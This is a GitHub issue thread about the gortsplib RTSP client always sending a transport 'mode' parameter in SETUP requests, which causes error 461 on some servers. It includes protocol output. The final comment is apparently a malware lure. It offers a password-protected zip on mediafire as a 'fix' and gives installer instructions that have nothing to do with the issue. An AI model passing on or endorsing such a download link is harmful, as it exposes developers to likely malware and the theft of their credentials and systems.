### ISSUE TITLE
Make transport mode optional

### ISSUE THREAD

**Issue by toreonify** [bluenviron/gortsplib#611]
When library establishes connection to RTSP server and send a `SETUP` request, it always sends `mode` parameter. For some reason with this parameter set server returns error 461.

FFMPEG (ffplay) doesn't send `mode` parameter and establishes connection successfully. When I removed 
mode setter from `pkg/headers/transport.go b/pkg/headers/transport.go` in `base.HeaderValue` it worked fine.

As I looked further, `mode` can be `nil` but it's always set in `client.go` in function `doSetup`.

Maybe add an option to disable this parameter or retry without it on error?

Same commented out block is also mentioned in https://github.com/bluenviron/gortsplib/issues/574#issuecomment-2123988354

## Version info

I'm using older version, but `client.go` still sets `mode` in newer versions too.

Go: 1.21.11 linux/amd64
gortsplib: v4.8.1
MediaMTX: https://github.com/bluenviron/mediamtx/commit/6513f05bb6165a6f6b0293a87f99713477941d53

Information about RTSP server from `DESCRIBE`:
```
RTSP/1.0 200 OK
CSeq: 2
Content-Base: rtsp://<connection url>
Content-Type: application/sdp
Content-Length: 264

v=0
o=- 0 0 IN IP4 127.0.0.1
s=No Name
t=0 0
a=tool:libavformat 58.29.100
m=video 0 RTP/AVP 96
a=rtpmap:96 H264/90000
a=fmtp:96 packetization-mode=1; sprop-parameter-sets=Z00AMp2oCoAv6EAAAPoAADDUIQ==,aOqPIA==; profile-level-id=4D0032
a=control:streamid=0
```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
